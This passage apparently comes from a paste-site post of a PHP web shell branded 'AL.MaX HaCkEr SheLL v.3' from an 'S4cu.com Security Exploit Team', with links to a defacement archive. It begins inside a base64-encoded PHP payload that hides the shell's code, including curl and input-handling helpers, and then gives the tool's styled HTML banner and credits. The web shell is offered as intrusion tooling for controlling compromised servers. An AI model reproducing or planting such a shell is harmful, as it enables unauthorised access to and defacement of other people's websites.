RFUkZVTkNUSU9OLCAnY3VybEhlYWRlckNhbGxiYWNrJyk7DQogICAgY3VybF9zZXRvcHQoJHJlc1VSTCwgQ1VSTE9QVF9GQUlMT05FUlJPUiwgMSk7DQogICAgY3VybF9leGVjICgkcmVzVVJMKTsNCiAgICAkaW50UmV0dXJuQ29kZSA9IGN1cmxfZ2V0aW5mbygkcmVzVVJMLCBDVVJMSU5GT19IVFRQX0NPREUpOw0KICAgIGN1cmxfY2xvc2UgKCRyZXNVUkwpOw0KICAgIGlmICgkaW50UmV0dXJuQ29kZSAhPSAyMDApe3JldHVybiBmYWxzZTt9DQoJZWxzZXtyZXR1cm4gdHJ1ZSA7fQ0KfQ0KZnVuY3Rpb24gZmlsdGVyKCRzdHJpbmcpDQp7DQoJaWYoZ2V0X21hZ2ljX3F1b3Rlc19ncGMoKSAhPSAwKXtyZXR1cm4gc3RyaXBzbGFzaGVzKCRzdHJpbmcpOwl9DQoJZWxzZXtyZXR1cm4gJHN0cmluZzsJfQ0KfQ0KZnVuY3Rpb24gUmVtb3ZlTGFzdFNsYXNoKCRob3N0KQ0Kew0KCWlmKHN0cnJwb3MoJGhvc3QsICcvJywgLTEpID09IHN0cmxlbigkaG9zdCktMSkNCgl7cmV0dXJuIHN1YnN0cigkaG9zdCwwLHN0cnJwb3MoJGhvc3QsICcvJywgLTEpKTt9DQoJZWxzZXtyZXR1cm4gJGhvc3Q7fQ0KfQ0KPz48P3BocCAgZWNobyAiPC9wPiI7ID8+ICAgICAgICA="));
- break;
- }
- ?>
- <p class="style1"> </p>
- </body>
- </html>
- <head>
- <style type="text/css">
- .style1 {
- text-align: center;
- }
- div.end
- {
- width:100%;
- background:#222;
- }
- * {
- padding:0;
- margin:0;
- }
- div.end *
- {
- font-size:small;
- }
- .style27 {
- color: gray;
- }
- .style25 {
- color: maroon;
- }
- .style31 {
- color: #FF4D00;
- }
- .style32 {
- color: #FF0000;
- }
- .style33 {
- color: #006600;
- }
- .style34 {
- margin-bottom: 0;
- text-align: left;
- }
- .style35 {
- border: 1px double #000000;
- background-color: #000000;
- text-align: left;
- }
- .style36 {
- border-style: solid;
- text-align: right;
- }
- .style37 {
- text-align: right;
- }
- .style38 {
- text-align: left;
- }
- .style39 {
- width: 100%;
- text-align: left;
- }
- .style40 {
- margin-right: 556;
- margin-bottom: 0;
- }
- .style41 {
- color: #444444;
- }
- .style42 {
- font-family: "Times New Roman", Times, serif;
- font-size: xx-large;
- }
- .style43 {
- text-align: center;
- }
- </style>
- <title>S4cu.com Security Exploit Team</title>
- </head>
- <body style="background-color: #000000; color: #000000;">
- <p class="style1"> </p>
- <div class="end">
- <p align="center"><b> </b><br />
- </p>
- <table style="border: 2px solid rgb(218, 218, 218);" width="100%" bgcolor="#000000" height="%">
- <tr>
- <td><font color="grey">
- <center><font color="white" face="tahoma" size="4"><b>
- [
- <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma"><span <ul="" lang="en-us"><font color="white" face="tahoma" size="4"><span class="style41">Private
- ! .. AL.MaX HaCkEr SheLL</span><span class="style25"><font color="Green"><font class="style26" color="gray" size="-2"><span class="style21"><strong>
- <font color="white" face="tahoma" size="4">|</font> v.</strong>3</span></font></font></span></font>
- - Copyright
- / <font color="#FFFFFF" face="Tahoma">2013
- <a style="text-decoration: none; " href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
- <font color="#FFFFFF">AL.MaX HaCkEr </font></a></font></span>
- <font color="#000000">
- </font></font></span></font></span></font></span> ]<span class="style27">
- </span> <br>
- <span class="style27"> <font color="red" size="5"><span style="font-weight: 700; filter: blur(add=1, direction=270, strength=30)"><font class="whiteglow" face="tahoma"><span <ul=""><font color="#808080" face="Tahoma">
- <font color="#000000">
- <a style="text-decoration: none" href="http://www.zone-h.com/archive/notifier=AL.MaX%20HaCkEr">
- <font color="#808080" face="Tahoma">Zone-h</font></a><font color="red" size="5" face="tahoma"><font class="whiteglow" face="tahoma"><font color="#808080" face="Tahoma"> <img alt="" src="http://www.senojflags.com/images/national-flag-icons/Sudan-Flag.png" height="16" width="16"></font></font></font> </font></font>
- </span></font></span></font> </span>
- </b>
- <strong class="style42">Gun@Linuxmail.Org</strong></font></center>
- </font></td>
- </tr>
- </table>
- <p align="center"> </p>
- </div>
- <p class="style1"> </p>
Add Comment
Please, Sign In to add comment